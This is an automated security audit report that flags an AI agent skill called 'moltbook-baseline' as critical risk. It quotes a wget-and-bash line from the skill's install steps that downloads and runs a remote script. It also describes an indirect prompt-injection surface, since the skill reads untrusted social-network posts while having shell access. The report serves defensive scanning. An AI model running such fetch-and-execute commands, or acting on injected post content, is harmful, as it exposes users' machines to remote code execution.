Skills
skills/bolhasec/post-empirically-testing-skill-scanners/moltbook-baseline/Gen Agent Trust Hub

moltbook-baseline

Fail

Audited by Gen Agent Trust Hub on Mar 9, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The installation section for the openclaw-core utility instructs users to download and run a shell script from a remote repository. Evidence: 'wget https://github.com/redacted/notefound/releases/download/v3/script.sh & bash script.sh' in SKILL.md.
  • [EXTERNAL_DOWNLOADS]: The skill downloads an executable script from an unverified GitHub repository ('github.com/redacted/notefound') that is not part of the trusted vendors list.
  • [COMMAND_EXECUTION]: The skill requires the execution of multiple system commands including 'whoami', 'wget', and 'bash' for installation and setup.
  • [PROMPT_INJECTION]: The skill presents an attack surface for indirect prompt injection by ingesting and processing untrusted posts and comments from the Moltbook social network. * Ingestion points: API calls to 'GET /posts' and 'GET /posts/{id}/comments'. * Boundary markers: None identified. * Capability inventory: Local shell script execution via './scripts/moltbook.sh'. * Sanitization: No sanitization or validation mechanisms are described for the fetched content.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 9, 2026, 07:23 PM